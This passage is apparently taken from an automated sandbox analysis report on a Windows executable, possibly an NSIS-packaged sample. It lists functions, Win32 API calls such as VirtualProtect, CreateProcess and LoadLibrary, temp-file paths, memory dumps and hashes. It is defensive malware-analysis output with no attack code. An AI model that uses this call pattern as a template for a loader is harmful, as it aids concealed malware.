                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: FileWrite
                                • String ID:
                                • API String ID: 3934441357-0
                                • Opcode ID: fcbaaa44ab5e5c94c5d9c511509a2faa156d79933b004821766515c4fe93841a
                                • Instruction ID: 9dc68c0638fdc05cdedacbb3ce278f0548e4c11d63521e27f6831e75186a9fb8
                                • Opcode Fuzzy Hash: fcbaaa44ab5e5c94c5d9c511509a2faa156d79933b004821766515c4fe93841a
                                • Instruction Fuzzy Hash: 78E0BF32600159BB9F206F96DD04D9FFF6DEE927A47124026B905A2150D670EA11DBE4
                                Function 00406280 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?), ref: 004062A9
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: a0b6da99e5e71265e8373ba8059e24fe5c697144cc542e2b776cf21a3b2d53e8
                                • Instruction ID: b0a4c2d15b2ea223642b35464fd2bd164e57500baa871115652c712219d0a331
                                • Opcode Fuzzy Hash: a0b6da99e5e71265e8373ba8059e24fe5c697144cc542e2b776cf21a3b2d53e8
                                • Instruction Fuzzy Hash: 2FE0BF72050209BEEF055F50DD0AD7B371DEB58310F01452EB90695151E6B5A9306634
                                Function 6FC31A4A Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(6FC3501C,00000004,00000040,6FC35034), ref: 6FC31A68
                                Memory Dump Source
                                • Source File: 00000002.00000002.20001269089.000000006FC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6FC30000, based on PE: true
                                • Associated: 00000002.00000002.20001233361.000000006FC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000002.00000002.20001307380.000000006FC34000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000002.00000002.20001344547.000000006FC36000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_6fc30000_temp_executable.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 4e6c54160d75ec88bd207a1f8f1071a7df412c905a5772f70275b4b61fe0d68c
                                • Instruction ID: 70f617863584f78340115b07ba31cd57202f27ef4f151d86bb082bd7143174a9
                                • Opcode Fuzzy Hash: 4e6c54160d75ec88bd207a1f8f1071a7df412c905a5772f70275b4b61fe0d68c
                                • Instruction Fuzzy Hash: AFF0AC76D19B43DACB388F1C95856053AF0B71A3E5B004D2EF349DA340D33281209BEA
                                Function 004062B3 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00424200,00000000,00000800,00424200,?,00406980,00000800,?,?,?,Call,00000000,00000000), ref: 004062D7
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Open
                                • String ID:
                                • API String ID: 71445658-0
                                • Opcode ID: 5d90062fdd1cff32f27602045ec2692a1b627fa5483aed50fd6290a01ccc32d2
                                • Instruction ID: a9f46a368aaeb036b72fdcd0ca7d488aed4e3e02bd852bac4dcbc1d9cb67b826
                                • Opcode Fuzzy Hash: 5d90062fdd1cff32f27602045ec2692a1b627fa5483aed50fd6290a01ccc32d2
                                • Instruction Fuzzy Hash: 4AD0173204020DBBDF11AF90EE01FAB3B2DBB08350F11482AFE06A51A0D776D530AB28
                                Function 00403131 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                Download Yara Rule
                                APIs
                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004035B2,?,?,?,?,?,?), ref: 0040313F
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: FilePointer
                                • String ID:
                                • API String ID: 973152223-0
                                • Opcode ID: eeb6e3b4f510f7bce7f4acd2004317b94e1f980229c798523801c224a6f07df3
                                • Instruction ID: 249934cc5d2069a5a678a88893d20fb7c04287045258dfdbdab4020963f10c22
                                • Opcode Fuzzy Hash: eeb6e3b4f510f7bce7f4acd2004317b94e1f980229c798523801c224a6f07df3
                                • Instruction Fuzzy Hash: 94B09231140200AADA214F009E0AF057B21AB90700F108434B290680F086711060EA0D
                                Function 0040211B Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00405D15: lstrlenW.KERNEL32(00424200,?,00000000,?,?), ref: 00405D47
                                  • Part of subcall function 00405D15: lstrlenW.KERNEL32(?,00424200,?,00000000,?,?), ref: 00405D59
                                  • Part of subcall function 00405D15: lstrcatW.KERNEL32(00424200,?,?,00424200,?,00000000,?,?), ref: 00405D74
                                  • Part of subcall function 00405D15: SetWindowTextW.USER32(00424200,00424200), ref: 00405D8C
                                  • Part of subcall function 00405D15: SendMessageW.USER32(00000000), ref: 00405DB3
                                  • Part of subcall function 00405D15: SendMessageW.USER32(00000000,0000104D,00000000,?), ref: 00405DCE
                                  • Part of subcall function 00405D15: SendMessageW.USER32(00000000,00001013,00000000,00000000), ref: 00405DDB
                                  • Part of subcall function 004066B1: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00425200,?), ref: 004066DA
                                  • Part of subcall function 004066B1: CloseHandle.KERNEL32(?), ref: 004066E7
                                • CloseHandle.KERNEL32(?,?), ref: 00402110
                                  • Part of subcall function 004064EF: WaitForSingleObject.KERNEL32(?,00000064), ref: 004064F9
                                  • Part of subcall function 004064EF: GetExitCodeProcess.KERNEL32(?,?), ref: 00406523
                                  • Part of subcall function 004065FA: wsprintfW.USER32 ref: 00406607
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                • String ID:
                                • API String ID: 2972824698-0
                                • Opcode ID: 98fe7140605b3d9a3fc2a8086af1ccc478904db8aec094e9b139f55772f9f99f
                                • Instruction ID: b5aa067e75477a963cdd38a123308a4d8481615e32ff78348eb7c7270180d37c
                                • Opcode Fuzzy Hash: 98fe7140605b3d9a3fc2a8086af1ccc478904db8aec094e9b139f55772f9f99f
                                • Instruction Fuzzy Hash: BEF0F431609351EBC310AE21D88882FB288EF85359B10093FFA12B51C2C77C4C0686AF
                                Function 6FC312F8 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GlobalAlloc.KERNELBASE(00000040,?,6FC311C4,-000000A0), ref: 6FC31302
                                Memory Dump Source
                                • Source File: 00000002.00000002.20001269089.000000006FC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6FC30000, based on PE: true
                                • Associated: 00000002.00000002.20001233361.000000006FC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000002.00000002.20001307380.000000006FC34000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000002.00000002.20001344547.000000006FC36000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_6fc30000_temp_executable.jbxd
                                Similarity
                                • API ID: AllocGlobal
                                • String ID:
                                • API String ID: 3761449716-0
                                • Opcode ID: fd622d6ba7d230c98449aebeedaa8a4d888be93f0ddce052b8910c03722eb48f
                                • Instruction ID: c1baa966c78e39c1a2a373b4f81a7cb76b77f95bd2635996ad8eb0b4f6327d1d
                                • Opcode Fuzzy Hash: fd622d6ba7d230c98449aebeedaa8a4d888be93f0ddce052b8910c03722eb48f
                                • Instruction Fuzzy Hash: 45B012F23004025FEE108718DE0AF303274F701355F000000F700D5040C12548208914

                                Non-executed Functions

                                Function 004043F9 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 576windowmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetDlgItem.USER32(?,000003F9), ref: 00404411
                                • GetDlgItem.USER32(?,00000408), ref: 0040441D
                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404465
                                • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 0040447E
                                • SetWindowLongW.USER32(00000000,000000FC,Function_000058AB), ref: 00404495
                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004044AB
                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004044BD
                                • SendMessageW.USER32(00000000,00001109,00000002), ref: 004044D0
                                • SendMessageW.USER32(00000000,0000111C,00000000,00000000), ref: 004044DC
                                • SendMessageW.USER32(00000000,0000111B,00000010,00000000), ref: 004044EE
                                • DeleteObject.GDI32(00000000), ref: 004044F1
                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040451F
                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404529
                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 004045D4
                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 004045FE
                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404614
                                • GetWindowLongW.USER32(?,000000F0), ref: 00404643
                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404650
                                • ShowWindow.USER32(?,00000005), ref: 00404664
                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 004047A1
                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040481C
                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040483B
                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404867
                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040489C
                                • ImageList_Destroy.COMCTL32(?), ref: 004048C3
                                • GlobalFree.KERNEL32(?), ref: 004048D3
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: MessageSend$ImageWindow$List_Long$GlobalItem$AllocCreateDeleteDestroyFreeLoadMaskedObjectShow
                                • String ID: M
                                • API String ID: 1688767230-3664761504
                                • Opcode ID: e527a44e3837e2842e9643811c94d438dc10ea4f06fb5cac42bc504d6044e278
                                • Instruction ID: 6b9816283df2d563a6f6303754403db0efd655586b529c1e8cba48373a45e4bc
                                • Opcode Fuzzy Hash: e527a44e3837e2842e9643811c94d438dc10ea4f06fb5cac42bc504d6044e278
                                • Instruction Fuzzy Hash: 4F12D0B1644301AFD3249F24DC45A2BB7E9EBC8314F10493EFA95E72E1DB789C428B59
                                Function 00404B0B Relevance: 54.3, APIs: 36, Instructions: 295windowclipboardmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetDlgItem.USER32(?,00000403), ref: 00404B6C
                                • GetDlgItem.USER32(?,000003EE), ref: 00404B7C
                                • GetClientRect.USER32(00000000,?), ref: 00404BB9
                                • GetSystemMetrics.USER32(00000002), ref: 00404BC1
                                • SendMessageW.USER32(00000000,00001061,00000000,00000002), ref: 00404BE3
                                • SendMessageW.USER32(00000000,00001036,00004000,00004000), ref: 00404BF2
                                • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00404C00
                                • SendMessageW.USER32(00000000,00001026,00000000,?), ref: 00404C0A
                                  • Part of subcall function 00405E95: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,00424200,?,00000000,?,?,?,00000000,?,?), ref: 0040604B
                                • SendMessageW.USER32(00000000,00001024,00000000,?), ref: 00404C1C
                                • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00404C40
                                • ShowWindow.USER32(00000000,00000008), ref: 00404C52
                                • GetDlgItem.USER32(?,000003EC), ref: 00404C74
                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00404C88
                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00404CA3
                                • SendMessageW.USER32(00000000,00002001,00000000,?), ref: 00404CAD
                                • ShowWindow.USER32(00000000), ref: 00404D22
                                • ShowWindow.USER32(00000000,00000008), ref: 00404D27
                                • GetDlgItem.USER32(?,000003F8), ref: 00404B8C
                                  • Part of subcall function 004054DE: SendMessageW.USER32(00000028,?,00000001,00405313), ref: 004054EC
                                • GetDlgItem.USER32(?,000003EC), ref: 00404CCD
                                • CreateThread.KERNEL32(00000000,00000000,Function_0000583F,00000000), ref: 00404CDB
                                • CloseHandle.KERNEL32(00000000), ref: 00404CE2
                                • ShowWindow.USER32(00000008), ref: 00404D5D
                                • SendMessageW.USER32(00000000,00001004,00000000,00000000), ref: 00404D9C
                                • CreatePopupMenu.USER32 ref: 00404DB0
                                • AppendMenuW.USER32(?,00000000,00000001,00000000), ref: 00404DCC
                                • GetWindowRect.USER32(00000000,?), ref: 00404DEA
                                • TrackPopupMenu.USER32(?,00000180,?,?,00000000,?,00000000), ref: 00404E0C
                                • SendMessageW.USER32(00000000,00001073,00000000,?), ref: 00404E3B
                                • OpenClipboard.USER32(00000000), ref: 00404E4B
                                • EmptyClipboard.USER32 ref: 00404E51
                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00404E5D
                                • GlobalLock.KERNEL32(00000000), ref: 00404E6A
                                • SendMessageW.USER32(00000000,00001073,00000000,?), ref: 00404E86
                                • GlobalUnlock.KERNEL32(?), ref: 00404EA9
                                • SetClipboardData.USER32(0000000D,?), ref: 00404EB4
                                • CloseClipboard.USER32 ref: 00404EBA
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlocklstrcat
                                • String ID:
                                • API String ID: 2901622961-0
                                • Opcode ID: e3a3b5db6e8f7872d6748160a89fdbae3d99834f52d0e9e06fc12283005a9987
                                • Instruction ID: 6359324f75213449b6abc0588f6453f91f7fc730003d35bba9c6bb800d03804c
                                • Opcode Fuzzy Hash: e3a3b5db6e8f7872d6748160a89fdbae3d99834f52d0e9e06fc12283005a9987
                                • Instruction Fuzzy Hash: BEA1C5B1205704BBD320AB25DD49F5B7FADFF88750F01493EF681A62A1CB788841CB69
                                Function 00404060 Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 281COMMON
                                Download Yara Rule
                                APIs
                                • GetDlgItem.USER32(?,000003FB), ref: 004040B1
                                • SetWindowTextW.USER32(00000000,?), ref: 004040DB
                                  • Part of subcall function 00406A15: GetDlgItemTextW.USER32(?,?,00000400,00404F27), ref: 00406A28
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,76073420,0040399D), ref: 00406D8D
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,?,?,00000000), ref: 00406D9C
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,76073420,0040399D), ref: 00406DA1
                                  • Part of subcall function 00406D18: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,76073420,0040399D), ref: 00406DB9
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Char$Next$ItemText$PrevWindow
                                • String ID: A$C:\Users\user\AppData\Local\Temp\identitetsproblemer\Mercerising$Call
                                • API String ID: 4089110348-3627432768
                                • Opcode ID: 7ee0f7904150dc878aeeec4f98168d1ec89735afe044028777f232ef559c64d1
                                • Instruction ID: 90192ee12d8343b5cbbbf9dcfc6b809e920884bf694149bd8a4c84d13eeda86d
                                • Opcode Fuzzy Hash: 7ee0f7904150dc878aeeec4f98168d1ec89735afe044028777f232ef559c64d1
                                • Instruction Fuzzy Hash: E391B1B1704311ABD720AFA6DD81A6B76A8AF84704F40043FFB45B62D1DB7CD9418B6E
                                Function 6FC32351 Relevance: 18.7, APIs: 12, Instructions: 705stringlibrarymemoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 6FC312F8: GlobalAlloc.KERNELBASE(00000040,?,6FC311C4,-000000A0), ref: 6FC31302
                                • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 6FC3294E
                                • lstrcpyW.KERNEL32(00000008,?), ref: 6FC329A4
                                • lstrcpyW.KERNEL32(00000808,?), ref: 6FC329AF
                                • GlobalFree.KERNEL32(00000000), ref: 6FC329C0
                                • GlobalFree.KERNEL32(?), ref: 6FC32A44
                                • GlobalFree.KERNEL32(?), ref: 6FC32A4A
                                • GlobalFree.KERNEL32(?), ref: 6FC32A50
                                • GetModuleHandleW.KERNEL32(00000008), ref: 6FC32B1A
                                • LoadLibraryW.KERNEL32(00000008), ref: 6FC32B2B
                                • GetProcAddress.KERNEL32(?,?), ref: 6FC32B82
                                • lstrlenW.KERNEL32(00000808), ref: 6FC32B9D
                                Memory Dump Source
                                • Source File: 00000002.00000002.20001269089.000000006FC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6FC30000, based on PE: true
                                • Associated: 00000002.00000002.20001233361.000000006FC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000002.00000002.20001307380.000000006FC34000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000002.00000002.20001344547.000000006FC36000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_6fc30000_temp_executable.jbxd
                                Similarity
                                • API ID: Global$Free$Alloclstrcpy$AddressHandleLibraryLoadModuleProclstrlen
                                • String ID:
                                • API String ID: 1042148487-0
                                • Opcode ID: 3e3e649ffa5568d9398132ef94c74d18899c4d022db021d9d989ff77da6219db
                                • Instruction ID: e04f1cc75c7e41a2d0afdfb7669f751df3c62d37f8d3f7e5c33643fdaa29224f
                                • Opcode Fuzzy Hash: 3e3e649ffa5568d9398132ef94c74d18899c4d022db021d9d989ff77da6219db
                                • Instruction Fuzzy Hash: 1C42AE73E487229FDB14CF39856069AB7E0FF89794F004A2EE599D6280F770E5448BD2
                                Function 0040234F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134comCOMMON
                                Download Yara Rule
                                APIs
                                • CoCreateInstance.OLE32(004089D0,?,00000001,004089B0,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004023D8
                                Strings
                                • C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp\System.dll, xrefs: 004024AC
                                • C:\Users\user\AppData\Local\Temp\identitetsproblemer\Mercerising\Trichoschistic, xrefs: 0040241F
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
